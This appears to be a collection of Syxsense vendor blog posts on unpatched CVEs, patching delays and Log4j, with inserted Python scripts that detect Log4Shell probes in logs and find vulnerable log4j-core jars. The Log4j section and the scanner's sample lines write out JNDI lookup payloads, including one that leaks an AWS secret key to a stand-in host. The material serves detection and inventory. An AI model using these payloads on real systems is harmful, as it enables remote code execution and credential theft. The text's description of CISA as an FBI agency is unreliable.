
Sloppy CVE Handling Could Mean It's Time to Update Your CV – Unless You Bring in an MSP

By BlogNo Comments

There are hundreds of Common Vulnerabilities and Exposures (CVEs) in existence, some more serious than others. All need attention, yet many organizations have gotten sloppy about how they take care of CVEs. Some take months to deploy the urgent patches that CVEs call for. Sometimes it can take years. In a few cases, organizations have unresolved CVEs that are more than a decade old.

Those in IT and cybersecurity that are guilty of ignoring or taking far too long to remediate CVEs are advised to either update their CVs and resumes and start sending them out – or bring in an MSP that can completely take care of patch management and vulnerability management. It’s the easy way to ensure no CVEs are unaddressed anywhere in IT systems.

CVEs in Neglect

Let’s take a look at some of the important CVEs that are largely neglected in many organizations. These are only a few examples out of many that could be lurking:

CVE-2018-13379 FortiGate VPNs: The CVE identifier includes the year of release. This one from 2018 is still being exploited despite regular alerts being issued about it. Advanced Persistent Threat (APT) groups continue to use it in attacks. It is such a severe risk that anyone using this VPN without the patch deployed should assume they are now compromised and begin incident management procedures. Remediation steps include removing these VPNs from service, returning them to factory default settings, reconfiguring them, installing all patches, and once done, returning them to service. An upgrade to the latest FortiOS version is also recommended. Further action indicated is to scan all hosts and networks that are in any way connected to the VPN to look carefully for any signs of malicious activity.

There are also several high-priority patches from 2019 that are often unpatched in enterprise systems:

CVE-2019-19781, affecting Citrix NetScaler, has been used to compromise, among others, an Australian defense database.

CVE-2019-11510 relates to Pulse Connect Secure. It can result in arbitrary file disclosure and leaks of admin credentials. This one has been used in attacks via VPNs and by nation-state actors.

CVE-2019-3396 for Atlassian Confluence is a remote code execution bug.

CVE-2020-0688 affects Microsoft Exchange. Dating back to early 2020, it leaves server data unencrypted and open to attack. Nearing its third anniversary, it remains a potent vulnerability for the bad guys to exploit.

This is just a partial list. Others from 2019 that are deemed serious include CVEs related to a Cisco router, Oracle WebLogic Server, Kibana, Zimbra software, and the Exim mail transfer agent. When you factor in the CVEs from 2020, 2021, and 2022, the list is very long indeed.

Watch Your Back

Anyone with vulnerabilities and CVEs left unpatched for more than a couple of months in 2022 should watch their back, as they are open to the charge of neglecting their cybersecurity duties. Anyone with un-remediated CVEs from 2021, 2020, 2019, or even as far back as 2018, as in the case of the FortiGate VPN, could well be looking for a new job soon. They had better dig out their CV and get it updated fast.

Before the axe falls, a smart move would be to draft in help from an MSP to help eliminate these vulnerabilities, institute vulnerability management and attack readiness processes, and fully patch all applications, operating systems, and endpoints including mobile devices.

Syxsense offers managed security services for patch management, vulnerability management, and remediation. These services provide real-time, 24-hour security coverage. Syxsense also offers an MSP/MSSP program with a world-class platform. Both are built on the foundation of Syxsense Enterprise, an automated patch management, vulnerability scanning, mobile device management (MDM) and IT management platform. It detects outdated patches and threats in real time and can be used to implement updates before bad actors can take advantage of exploits. Syxsense Enterprise incorporates Zero Trust practices and includes features such as patch supersedence, patch roll back, and a wealth of automation and configuration features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.

For more information, visit: www.Syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Long Patching Delays Haunt Enterprise Cybersecurity


Imagine a kingdom facing invasion from a hostile and determined foe. The citizens band together to build the highest and widest walls possible. They erect battlements, dig deep moats filled with water, forge mighty gates of the strongest metal, and spend countless thousands of hours making sure they are fully secure – only for all to be lost as someone forgot to lock the back gate being used to take out the garbage.

A similar situation is haunting modern enterprise “kingdoms.” Businesses are spending a fortune on cybersecurity – as much as 20% of the overall IT budget. They are deploying intrusion detection and remediation systems, endpoint management technology, Security Information and Event Management (SIEM), threat detection, ransomware prevention, next generation firewalls, Zero Trust Network Access (ZTNA), multifactor authentication (MFA), Secure Access Service Edge (SASE), and a host of other solutions to remain free of breaches. But the entire team is being let down by one little patch that was never deployed on a critical server. Result: the bad guys get in, hold the organization to ransom, extort millions, and live to wreak havoc another day.

This situation is far closer to reality than fairytale in many organizations. Orange Cyberdefense’s Security Navigator 2023 report revealed many startling findings. But by far the most shocking was the state of enterprise patching. Researchers found that businesses are taking an astonishing 215 days to patch a reported vulnerability. Even for critical vulnerabilities, it generally still takes more than 6 months to deploy a patch.

Take the Log4j vulnerability. It was originally discovered on 9 December 2021, which means that, on average, most organizations had not deployed the many patches released to counter Log4j until July of 2022. How could it be that this vulnerability was labeled by many as one of the most serious that had appeared in years, yet so many chose to ignore the warnings and left the patches gathering dust?

Why So Long to Patch?

What might be the reasons why it could possibly take so long for organizations to deploy urgent patches? Complacency and neglect are certainly factors to consider. Functions like patching and backup are often taken care of as routine and non-emergency duties. Perhaps initially, they are given importance.

New patch management software or services are obtained. Best practices are discussed and implemented. All is well for a while. But over time, these functions receive less and less attention. They are perhaps still done, but fewer eyes are on them, no one bothers to check whether patching was deployed correctly, whether new systems and devices were added to the patching schedule, how long patches took to deploy, or how many patches are currently backlogged.

Testing is another area where organizations can inadvertently cripple patching effectiveness. Once upon a time, they may have suffered some problems due to a glitchy patch that caused downtime. They institute a lengthy and laborious patch testing protocol which, in reality, means that every patch has to go through testing before being sent anywhere. As a result, some patches take an age to be deployed.

There is no time to lose in installing priority patches. Syxsense provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches rapidly across the wire once and then use peer-to-peer within the network for local distribution. This ensures there are no network bottlenecks blocking patch delivery. In the case of a patch or update that causes incompatibilities in other systems, patch roll back features allow you to return systems to the state that existed before the implementation of a new patch.

Lack of Automation in Patching

Lack of automation, too, can dead-end organizational patching. If it remains a manual process, it becomes all too easy for someone to forget to deploy patches or omit transmitting them to half the devices in the network. With hundreds or even thousands of endpoints to manage, lack of automation can delay the implementation of critical patches. Automation saves time as IT no longer has to formulate scripts, hop from one screen to another, or manually push out patches to various destinations.

Additionally, there are factors such as incomplete inventorying of devices and poor reporting. It is one thing to say all systems are patched and fully updated. But it is another to be able to prove it. Comprehensive inventorying and reporting are vital.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides immediate turnaround for the testing and delivery of patches as well as peer-to-peer technology that delivers patches to all devices fast.

For more information, visit: www.Syxsense.com


Syxsense Predicts Critical Infrastructure Attacks, More Cyber-Regulation, Faster Zero-Day Exploitation, and Slow but Steady Growth of Zero Trust in 2023


Jonathan Cassell, Senior Solutions Architect at Syxsense, gazed into the cyber-crystal ball and came up with several predictions for 2023. These include more cyberattacks on critical infrastructure, increased cyber-regulation, faster zero-day exploits, and growing adoption of zero trust, though not at a pace necessary to significantly reduce the quantity of successful cyberattacks.

Here goes:

Attacks on Critical Infrastructure

2021 and 2022 saw the appearance of serious attacks on critical infrastructure. The famous ones included the Colonial Pipeline breach that took down east coast fuel supplies for a few days and sent gas prices soaring, and the ransomware attack on JBS, the largest meat processing firm in the world, that disabled beef and pork slaughterhouses and impacted facilities in the U.S., Canada, and Australia. Expect more of the same in 2023, and perhaps even bigger targets getting hit.

More Cyber-Regulation

The FBI’s Cybersecurity and Infrastructure Security Agency (CISA) has had quite a year. It was regularly in the news through the issuance of alerts about Common Vulnerabilities and Exposures (CVEs), Shields-Up notifications to guard against Log4j and other threats, and actions pressing many enterprises to fix vulnerabilities deemed to be a severe threat. Don’t think that the higher profile of CISA isn’t going to ripple into other facets of government. Therefore, more cybersecurity legislation is probably on the cards. There is also talk about a potential federal-level privacy regulation similar to the EU’s GDPR.

Regardless of regulatory pressure, insurers are turning the screws on businesses, demanding that they institute stronger cybersecurity safeguards if they want to be given cyber-insurance. Some are being turned down, some given high premiums, and others given less than comprehensive coverage as they were not deemed to have sufficient layers of protection in place.

Faster Zero-Day Exploits

The term zero day refers to a recently discovered security vulnerability that the vendor or developer has only just learned about. Hence the term: they have had zero days to remediate it. Zero-day vulnerabilities are particularly worrying as they can be exploited by cybercriminals before developers have addressed them by issuing patches and figuring out remediation steps. These exploits, therefore, can cause serious damage and data theft until the flaw is fixed.

When Log4J was discovered, for example, it led to a scramble by a great many vendors and a rash of patches and remediation protocols.

The bad news is that 2023 will probably bring even quicker zero-day exploits leading to shorter time frames between attacks. It may even lead to manufacturers and other victims not discovering such vulnerabilities for longer periods, and not disclosing them promptly either.

Zero-Trust Grows, But Slowly

There is great hope in the cybersecurity community that zero-trust network access (ZTNA) will solve a lot of ongoing difficulties. Certainly, ZTNA is growing and should grow more in 2023. However, we don’t yet see the market traction for it to be deployed widely in enough businesses to make a serious dent in the number of cyberattacks and breaches.

ZTNA encompasses technologies that enable secure access to internal applications. It grants access on a least-privileged basis via granular policy management to give verified users secure connectivity to private applications while protecting the network and avoiding exposing apps to the internet. Thus, Zero Trust is all about securing IT infrastructure and data via a framework that can safeguard remote workers, hybrid cloud environments, and IT in general. It works on the assumption that any network is always at risk of either internal or external attack. In essence, Zero Trust means an individual is not trusted just because they are on the network. They must prove who they are and are given only limited access to the systems they need. Beyond safeguarding and vetting individual identities, the next frontier is now verifying machine identities such as the specific device and browser being used for access.

The Syxsense Zero Trust module, part of Syxsense Enterprise, provides hundreds of parameters IT can use to report and act on device compliance. For example, it can determine if a laptop is accessing a NetSuite server after hours from an IP address in an unfamiliar location. If so, it blocks it. It also has the power to enforce compliance with Zero Trust policies prior to granting access on an asset-by-asset basis. And it includes automated remediation of non-compliant endpoints, which could include patching the system, enabling an antivirus tool and making sure its signature patterns are up to date, emailing IT about unauthorized access, and more.

For more information, visit: www.Syxsense.com


How System Administrators and IT Managers Can Get More Sleep


Those working in IT grow accustomed to pagers or smartphones going off in the middle of the night. That means they must get dressed, grab a quick coffee, and head into the office to resolve the latest security alert, server outage, or network glitch. It can happen on weekends, too. Instead of a relaxing lie-in for some much-needed hours of extra slumber, an alert comes in – or it happens during precious leisure hours with family and friends. The IT staffer must pack up the beach towels or turn off the barbeque or the game, kick off the flip-flops, and take that long commute to work.

By deploying Syxsense for automated patch management, mobile device management (MDM), vulnerability scanning, IT management, and remediation, IT personnel can greatly increase their number of hours of undisturbed sleep AND feel far less resistance about meeting each new day. Here’s how:

Morning Slumbers

A fascinating study by Best Mattress Brand revealed that the job one does and the industry worked in have a definite influence on the number of minutes people lie in bed after the alarm sounds. Regardless of the time you need to be at work, you’re going to set an alarm depending on how long it takes you to get up, get ready, and get to your workplace. These times are often influenced by factors such as the stress one has to endure, the type of responsibility each person has, and the way each one of us decides to face the day ahead.

Those who stay in bed the least seem to be working in transportation and warehousing (8 minutes), homemaking (8 minutes), construction (7 minutes), and manufacturing (7 minutes). Medical and healthcare, finance and insurance, and IT all stand at an average of 11 minutes of lying in bed after the alarm, while government and public administration, education, and wholesale and retail workers take on average 10 minutes.

The study found that job satisfaction was somewhat correlated to the length of time people want to linger in bed. Those least happy at work tended to lie in bed for around 11 minutes – the same as IT.

Certainly, there may be other factors. Nevertheless, all those late night and weekend alerts, and the intense stress of working in a stressful malware-saturated environment seem to be taking their toll on system administrators and IT managers. They either want to remain in bed a few extra minutes to make up for lack of sleep, or they stay under the covers longer as they try to muster the courage to face another hectic day of ransomware threats, phishing alerts, and data breaches.

Syxsense Can Help You Get More Sleep

Experts say sleep is as important for good health as diet and exercise. A good night’s sleep improves brain performance, mood, and health. Not getting enough quality sleep regularly raises the risk of many diseases and disorders.

Syxsense is a sure way for system administrators, IT managers, and cybersecurity personnel to get more sleep, improve their mood, and improve productivity. It automates the entire process of patch management, vulnerability scanning, and mobile device management (MDM). As it protects organizations from breaches by blocking users on untrusted devices, it helps organizations create a security posture that encompasses the various criteria necessary to be granted trusted access. It can also automatically apply fixes and remediate issues in real time to enable proper access. Remediation actions might include deploying an urgently needed security patch, updating the anti-virus signature database, and alerting IT about unauthorized access attempts.

By deploying Syxsense Enterprise, IT personnel gain peace of mind. They can go to bed at night confident that they are extremely unlikely to be disturbed by the strident sound of a pager. They can engage in activities with family and friends at the weekend without the specter of yet another interruption due to the latest emergency. By sleeping better, they can wake up refreshed and increase their level of happiness and job satisfaction.

For more information, visit: www.Syxsense.com


Syxsense Scores High in GigaOM Patch Management Report


Vendors often fight over whose solution is best. They set up their own tests to prove that they are better than the competition. Unfortunately, vendor-sponsored tests sometimes include a certain bias. Say vendor X knows its software works well at a specific volume of traffic running application A and that a competitor’s solution doesn’t perform as well on that specific workload. The test can be rigged to focus on those parameters. Hey, presto! Vendor X scores much better than its rival, “proving” its superiority.

Hence, it is always best to look for independent evaluations of different products with no bias of any kind (such as vendors sponsoring the study). Research firm GigaOM operates in this way. Its studies are done in a way to maintain objectivity.

Recently, GigaOM evaluated 18 patch management vendors to determine which solutions were the strongest. That put Syxsense up against some long-established giants such as Ivanti, BMC, and Tanium that are more than ten times our size. The analyst firm graded Syxsense as a Leader in patch management and a Fast Mover in a challenging marketplace.

This high rating came about due to the breadth and depth of the Syxsense offering when it comes to identifying, acquiring, verifying, and installing patches to physical and virtual devices, and software systems. GigaOM analyst Ron Williams carefully looked into areas such as patch characterization, prioritization, testing, implementation tracking, and verification to determine the robustness and comprehensiveness of each patch management solution. He checked the range of operating systems (OSs), applications, and environments they can work with.

How Syxsense was Graded

Syxsense gained an outstanding rating from GigaOM for all market segments: small and midsized businesses (SMBs), large enterprises, and as something managed service providers (MSPs) can use to provide patch management to their clientele.

While some vendors specialize in one OS or one environment and some don’t have the ability to patch mobile devices, Syxsense performed well in GigaOM tests due to its extensive range of coverage. Besides Syxsense, only two other vendors out of 18 were given an outstanding rating against all areas of patch coverage: desktop and server Windows and Linux, desktop macOS, mobile, and remote systems.

GigaOM makes particular use of what it calls its key evaluation criteria to compile these detailed comparison reports. Syxsense was graded by the analyst firm as being very capable in inventorying, tested sources, and patching architecture, and outstanding in lifecycle management, patch testing, patch deployment, patch prioritization, and patching of third-party and in-house applications. Further, when graded against the evaluation metrics of flexibility, management capabilities, resource load management, security, usability, and patch reporting, Syxsense came out as outstanding in all categories. No other solution scored higher on these metrics.

GigaOM’s Opinion of Syxsense

Beyond its Leader and Fast Mover rating, GigaOM went into detail about how Syxsense patch management fared during the evaluation process. It explained that the company’s customers range from 100 to 100,000 endpoints and that the platform consists of a larger set of tools focused on intelligent (AI-based) endpoint management. With full coverage of Windows, macOS, and Linux desktops and servers, as well as mobile devices and remote systems, Williams stated:

“Syxsense provides a strong patch management solution, especially when the rest of the portfolio is considered. It covers all identified patching targets. Its strengths lie in lifecycle management, patch testing, patch deployment, patch prioritization, and a large number of third-party applications. Syxsense also supports an API, allowing integration with other systems such as ITSM and CMDB.”

In terms of challenges, he noted that Syxsense uses only a trusted repository of vendors. In Williams’s opinion, this disallows the use of distributed repositories and may present a bottleneck when a large number of endpoints are patched in the same physical location, though there are methods to mitigate this issue. Syxsense addresses the patch deployment bandwidth challenge by intelligently distributing applications and patches without tying up bandwidth across the enterprise. This is accomplished using technology that sends software and patches across the wire once, using peer-to-peer within the network for local distribution.

You can find out more about it and download the report here:

Syxsense Named a Fast Mover in GigaOm Radar Report for Patch Management Solutions


2023 Predictions from the Endpoint Security Experts


Ashley Leonard, CEO of Syxsense, provides his thoughts on the world of cybersecurity and what to expect in 2023. He touches on diverse areas such as Zero Trust, artificial intelligence (AI), cloud-based attack vectors, autonomous endpoints, and the vital need for orchestration and automation in security.   

Zero Trust Comes of Age

Zero Trust has been a huge buzzword in 2022. However, the actual application of Zero Trust technology within corporate infrastructure has been limited. According to Dell’s Global Data Protection Index, only 12% of large organizations have implemented a Zero Trust architecture, though 91% say they are either aware of or are planning to deploy it soon.

My prediction for 2023, therefore, is that we will finally see Zero Trust concepts implemented broadly within corporate IT environments. Accordingly, we have added a new Syxsense Zero Trust module within Syxsense Enterprise that enables endpoint compliance with Zero Trust Network Access (ZTNA) policies. It serves as an organization’s “Trust Evaluation Engine” for endpoints, offering control over network access policies, and enables security teams to build sophisticated access policies and remediation workflows to ensure ZTNA compliance.

AI Brings Both Good and Evil

Another technology that has been talked up for years yet has somewhat limited implementations is AI. My prediction for 2023 is that we will see an AI arms race, with both the good and the bad guys utilizing AI far more heavily.

The good guys will harness it in many ways: for real-time threat monitoring; to add even more power and speed to patch and vulnerability scanning; and to correlate logs and data sources across the enterprise in real time to spot the patterns that indicate a Distributed Denial of Service (DDoS) attack, a phishing outbreak, compromised accounts, ransomware, or data breaches. AI will take security systems to a higher level of pace, sophistication, and capability. And it is coming just in time.

Why? The bad guys are harnessing AI, too. They are using it to find ripe ransomware targets, to figure out the attack vectors that will bring the biggest payout, and to assess the potential worth of targets automatically. For example, it is well known that Common Vulnerabilities and Exposures (CVEs) scored 8 and above are given high priority for patching and remediation in many businesses. AI is being used to figure out combinations of low- and high-priority CVEs to find the easiest way into a business. By beginning with a 6- or 7-rated CVE, cyber gangs know that some of these patches might not be deployed in many organizations. From there, they can enter and then exploit more serious vulnerabilities. The moral is clear: patch all your systems religiously and perform regular vulnerability scans.

Cloud Attacks Multiply

As many IT departments have moved critical business functions to the cloud such as those for email, accounting, and customer relationship management (CRM), this has resulted in the cloud becoming a bigger attack target. My prediction is that we will see a major increase in cloud security breaches in the coming year.

Data from Microsoft shows Azure deployments rising at a rate of 33% a year. Cybercriminals know this, and they have realized that enterprises often have a blind spot when it comes to cloud security. Some businesses think the cloud provider is responsible for the protection of their data when it is actually their own responsibility. The cloud provider is only responsible for the integrity of its own cloud infrastructure. Hence, cloud breaches are common and they are going to become even more frequent until cloud data security is prioritized.

Autonomous Endpoints

In recent years, there has been tremendous focus on the cloud as a way to centralize compute and storage resources. This has certainly been a great leap forward. But think about it for a moment. Businesses possess incredibly powerful processors inside storage equipment, servers, and desktops. These systems are underutilized in many cases. A prediction for 2023 is that many of the tasks managed today by the cloud could be better performed at the endpoint – and we will begin to see some functions decentralized onto endpoints to take advantage of this untapped compute potential.

More Orchestration and Automation

IT departments can expect to be stretched to the limit in 2023 as inflation and a global recession put additional pressure on IT budgets. Hiring freezes are likely in some quarters. IT will be told yet again to do a lot more with fewer people. The only way to survive in such a climate is to add more orchestration and automation capabilities. Expect, therefore, that orchestration and automation technologies will be more heavily used in the coming year to enable IT to maintain security and service.

Syxsense offers automated patch management, vulnerability scanning, mobile device management, remediation, and IT management in one integrated suite. This enables IT to orchestrate a great many functions from one console, eliminating manual labor that can easily consume many hours.

For more information visit www.Syxsense.com  


Don’t Get Complacent about Log4j


The Log4j vulnerability burst onto the scene in December of 2021. One cybersecurity firm reported that the flaw was utilized in attacks on more than 40% of global networks, and that more than 100 breach attempts utilized it every minute when it first came out. At the time, the director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it posed a severe risk and was perhaps the most serious threat she had seen in her lengthy career. No wonder government agencies panicked. All civilian federal agencies were ordered to immediately fix this vulnerability. Vendors, too, were concerned, rushing out a series of patches. There were dozens of patches to deploy related to Log4j.

A year on from the initial turmoil occasioned by this zero-day threat, where do we stand? Log4j continues to be exploited. After so many patches were made public by so many vendors, there are still plenty of organizations that have failed to install them. No wonder cybercriminals continue to enjoy success with this potent vulnerability.

Log4j Fundamentals

The Log4j vulnerability allows attackers to perform remote code execution and gain access to servers. They can use the Java logging library to deliver crypto-mining malware, steal usernames and passwords, access other systems, or cause a local denial-of-service condition.

Part of the problem for the continuing menace posed by Log4j is that it is embedded in almost all Java-based products or web services. In fact, it is so deeply embedded in Java-based systems that it is proving difficult for IT to find all the versions of it that may be running within its infrastructure, applications, or in the cloud. Hence, it is quite common for some IT departments to believe that they took care of it completely. Yet the reality is that they only dealt with the obvious places where it resides.

Beyond IT systems, Log4j is also heavily used in Supervisory Control and Data Acquisition (SCADA) systems and historian systems within many industrial and infrastructure systems. As these systems often have dependencies on other systems, cybercriminals can potentially use them to infiltrate the enterprise.

Another factor in the scary nature of Log4j is how little an attacker has to do. Many applications use the library to log data received from external sources, such as HTTP headers or form fields, and vulnerable Log4j versions evaluate lookup expressions such as ${jndi:ldap://attacker-host/a} wherever they appear in a logged string. Hackers could take advantage of this simply by typing malicious text into a web application field, for example. Because the JNDI lookup fetches and loads a Java class from the attacker's server, code execution became possible on a remote basis. The more creative among cyber-attackers have even nested lookups such as ${env:...} inside the request so that runtime and environment variables, including API keys and other credentials, are leaked to the attacker's server.
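To make that mechanism concrete, here is an added example (not code from the original post or from Syxsense) that scans web-server log lines for Log4Shell probes. It folds the lookup forms attackers used to evade naive pattern matching (${lower:}, ${upper:} and the ${::-x} default-value trick), then reports the JNDI scheme the victim would connect out on and any nested ${env:} or ${sys:} lookups that would leak secrets. The log lines are constructed samples and the addresses are documentation ranges, not real infrastructure.

```python
import re

# Constructed sample access-log lines (not real traffic). The User-Agent field is
# where a probe string commonly lands because many applications log it verbatim.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.7}"',
]

# An innermost ${...} lookup: a body that itself contains no '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>:...} after normalisation; the scheme is what the JNDI client contacts.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)
# Lookups attackers nest inside the JNDI URL to carry secrets out in the request.
_LEAK = re.compile(r"\$\{\s*(env|sys|java|ctx|main)\s*:\s*([^${}:]+)", re.IGNORECASE)


def _fold(body):
    """Evaluate the Log4j lookups an attacker uses purely for obfuscation.
    Returns the folded text, or None when the body is not one of those forms."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    # ${x:-default} yields 'default' when lookup x is unknown; ${::-j} is the common trick.
    if ":-" in body and not low.startswith("jndi"):
        return body.split(":-", 1)[1]
    return None


def normalize(text):
    """Repeatedly fold innermost obfuscation lookups until nothing changes."""
    while True:
        changed = False

        def repl(m):
            nonlocal changed
            folded = _fold(m.group(1))
            if folded is None:
                return m.group(0)
            changed = True
            return folded

        text = _INNERMOST.sub(repl, text)
        if not changed:
            return text


def _lookup_at(text, start):
    """Return the ${...} expression beginning at `start`, honouring nested braces."""
    depth = 0
    i = start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]


def scan_lines(lines):
    """One finding per line carrying a JNDI lookup: the outbound scheme, whether the
    probe was obfuscated, and any secret-bearing lookups nested inside it."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        text = normalize(raw)
        m = _JNDI.search(text)
        if m is None:
            continue
        payload = _lookup_at(text, m.start())
        findings.append({
            "line": number,
            "scheme": m.group(1).lower(),
            "obfuscated": text != raw,
            "leaks": [f"{k.lower()}:{v}" for k, v in _LEAK.findall(payload)],
            "payload": payload,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        print(finding)
```

Matching on the raw string alone would miss the third and fourth lines; normalising first is what lets one regex catch the variants. Any hit on a host that also made an outbound LDAP, RMI or DNS connection around that timestamp should be treated as a likely compromise, not just a scan.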

For those wanting more information, the open-source Log4j Java logging component problem was eventually tracked as four vulnerabilities: CVE-2021-44228 (the original remote code execution flaw), followed by CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832, which cover further weaknesses found after the initial fixes. These CVEs offer plenty of data on the bug, where to find it, and its various remedies.

Good News and Bad News

The good news is that Log4j attacks have been trending downward throughout 2022. But organizations cannot relax. The bad news is that there has been evidence of surges in its use by cybercriminals of late. One happened in June and another in August. The latter one saw Log4j playing a part in several high-priority security incidents.

Enterprises are advised, therefore, to check, check, and check again to ensure they have eradicated this problem completely from any and all systems.

CISA issued a series of recommendations for organizations to fix Log4j. Among these are points such as:

1. Enumerate any external-facing devices that have Log4j installed.

2. Download all relevant vendor patches for the applications and operating systems in use throughout the enterprise. Patches are available from Microsoft, IBM, Adobe, Cisco, VMware, and many other vendors to remedy Log4j.

3. Patch them all using an automated patch management system.
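The inventory step is where most organizations fell short, because Log4j is usually buried inside application archives rather than installed as a package. The following added example (not Syxsense's tooling or code from the original post) walks a directory tree, opens every .jar/.war/.ear, recurses into nested archives, and reports copies that contain the JndiLookup class together with the version read from log4j-core's pom.properties. The build_demo_tree function constructs a fake vulnerable jar and a web archive nesting a fixed one so the scanner runs offline; the fixed-version thresholds (2.17.1, with 2.12.4 and 2.3.2 for the Java 7 and Java 6 branches) are those published with CVE-2021-44832. A caveat: a shaded or repackaged copy under a different class path would not be found this way.

```python
import io
import os
import tempfile
import zipfile

# Real paths inside log4j-core jars: the class implementing ${jndi:...} lookups and
# the Maven metadata that records the version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def is_vulnerable(version):
    """True unless the version is at or above the final fix for the four Log4Shell CVEs:
    2.17.1 (Java 8+), 2.12.4 (Java 7 branch), 2.3.2 (Java 6 branch)."""
    try:
        parts = tuple(int(p) for p in version.split(".")[:3])
    except ValueError:
        return True  # unreadable version: treat as vulnerable until proven otherwise
    parts = parts + (0,) * (3 - len(parts))
    if parts[0] != 2:
        return True  # 1.x is end-of-life and carries its own unfixed issues
    if parts[1] == 3:
        fixed = (2, 3, 2)
    elif parts[1] == 12:
        fixed = (2, 12, 4)
    else:
        fixed = (2, 17, 1)
    return parts < fixed


def _read_version(zf):
    """Version from pom.properties, falling back to the manifest, else 'unknown'."""
    if POM_PROPS in zf.namelist():
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return "unknown"
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return "unknown"


def scan_archive(zf, location):
    """Report log4j-core copies in this archive and, recursively, in archives nested in it."""
    findings = []
    names = zf.namelist()
    if JNDI_CLASS in names:
        version = _read_version(zf)
        findings.append({"location": location, "version": version,
                         "vulnerable": is_vulnerable(version)})
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                findings.extend(scan_archive(inner, f"{location}!{name}"))
    return findings


def scan_path(root):
    """Walk a directory tree and scan every archive found under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(scan_archive(zf, path))
            except zipfile.BadZipFile:
                continue  # not a real archive despite the extension
    return findings


def build_demo_tree(root):
    """Constructed fixture (not real software): a stand-alone vulnerable log4j-core jar
    and a web application archive nesting a fixed one. The class entry is an empty
    placeholder; the scanner keys on its path, not its bytes."""
    os.makedirs(os.path.join(root, "lib"))
    with zipfile.ZipFile(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "w") as zf:
        zf.writestr(JNDI_CLASS, b"")
        zf.writestr(POM_PROPS, "version=2.14.1\n")
    nested = io.BytesIO()
    with zipfile.ZipFile(nested, "w") as zf:
        zf.writestr(JNDI_CLASS, b"")
        zf.writestr(POM_PROPS, "version=2.17.1\n")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", nested.getvalue())


def demo():
    """Build the fixture in a temporary directory and scan it; findings sorted by version."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return sorted(scan_path(root), key=lambda f: f["version"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run scan_path against application directories, container image layers and build caches, not just /opt and the web server's lib directory; the nested-archive recursion is what surfaces the copies that a package manager query never lists.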

Those kinds of actions may require extensive inventorying and patching of enterprise systems. Syxsense can help businesses discover all impacted endpoints, devices, and systems and deploy fully tested patches to wherever they are needed rapidly. Its automation features will save IT departments a great many hours, if not days, when it comes to once and for all dealing with the Log4j scourge.

For more information visit www.Syxsense.com  

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Rampant Ransomware and Data Breaches + Lack of Cybersecurity Talent = Surging MSSP Demand


A casual glance at the headlines is far from reassuring concerning the state of enterprise security. Whether it is the billions being paid out to criminal gangs, the millions of customers whose personal data was hacked, or the latest vulnerability impacting IT systems, the bad news keeps piling up. And with organizations unable to fill urgent cybersecurity jobs – or even entry level positions – the situation looks grim.  

Managed Security Service Providers (MSSPs), though, view these developments in a different light. They see these megatrends as a sure sign that the MSSP market is going to remain healthy for the foreseeable future. Organizations need all the cybersecurity help they can get.

Let’s summarize some of the latest malware and cyber-staffing shortage headlines:  

Massive Payouts  

